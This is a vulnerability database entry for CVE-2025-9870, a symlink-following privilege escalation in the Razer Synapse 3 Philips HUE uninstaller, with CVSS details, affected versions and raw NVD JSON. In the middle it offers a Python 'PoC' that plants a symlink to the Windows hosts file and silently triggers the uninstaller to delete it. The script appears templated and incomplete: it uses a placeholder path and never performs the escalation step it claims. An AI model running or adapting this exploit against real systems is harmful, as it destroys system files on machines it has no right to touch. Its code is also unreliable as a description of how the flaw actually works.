Security Vulnerability Report
CVE-2025-9870 CVSS 7.8 HIGH

CVE-2025-9870

Published: 2025-10-29 20:15:37
Last Modified: 2025-11-04 21:31:49

Description

Razer Synapse 3 RazerPhilipsHueUninstall Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Razer Synapse 3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Philips HUE module installer. By creating a symbolic link, an attacker can abuse the installer to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-26375.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:razer:synapse:*:*:*:*:*:*:*:* - VULNERABLE
Razer Synapse 3 versions before 3.10.730.71519 (Philips HUE module versions with vulnerable uninstaller)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9870 PoC - Razer Synapse 3 Symlink LPE
# Target: Razer Synapse 3 RazerPhilipsHueUninstall
# Environment: Windows with Razer Synapse 3 installed
import os
import sys
import subprocess
import shutil
import ctypes


def create_symlink(target, link_name):
    """Create a symbolic link (requires admin on older Windows)"""
    try:
        if os.path.exists(link_name):
            os.remove(link_name)
        os.symlink(target, link_name)
        print(f"[+] Symlink created: {link_name} -> {target}")
        return True
    except Exception as e:
        print(f"[-] Failed to create symlink: {e}")
        return False


def exploit():
    """
    Exploitation steps:
    1. Identify target file to delete (e.g., security-related DLL)
    2. Create symlink from installer target path to critical file
    3. Trigger RazerPhilipsHueUninstall
    4. Leverage for privilege escalation
    """
    # Step 1: Identify Razer Synapse installation path
    razer_path = r"C:\Program Files\Razer\Synapse3"
    uninstall_path = os.path.join(razer_path, "RazerPhilipsHueUninstall.exe")

    # Step 2: Target critical file for deletion
    # Replace with actual vulnerable path from Philips Hue module
    vulnerable_path = r"C:\Users\Public\Documents\PhilipsHue\temp\config.dat"
    target_file = r"C:\Windows\System32\drivers\etc\hosts"  # Example target

    # Step 3: Create parent directory if needed
    parent_dir = os.path.dirname(vulnerable_path)
    if not os.path.exists(parent_dir):
        os.makedirs(parent_dir, exist_ok=True)

    # Step 4: Create symlink
    if create_symlink(target_file, vulnerable_path):
        print("[+] Symlink ready, triggering uninstaller...")

        # Step 5: Trigger uninstaller (may require user interaction)
        try:
            subprocess.Popen([uninstall_path], creationflags=subprocess.CREATE_NO_WINDOW)
            print("[+] Uninstaller triggered")
        except Exception as e:
            print(f"[-] Failed to trigger uninstaller: {e}")

    return True


if __name__ == "__main__":
    if ctypes.windll.shell32.IsUserAnAdmin():
        print("[!] Run as low-privilege user for proper testing")
    else:
        print("[*] Running as low-privilege user")
    exploit()

References

https://www.zerodayinitiative.com/advisories/ZDI-25-921/ (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9870", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:37.080", "lastModified": "2025-11-04T21:31:48.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Razer Synapse 3 RazerPhilipsHueUninstall Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Razer Synapse 3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Philips HUE module installer. By creating a symbolic link, an attacker can abuse the installer to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-26375."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:razer:synapse:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.10.730.71519", "matchCriteriaId": "3EF1AF2E-84DF-4252-B5F7-DB4DACFBA510"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-921/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}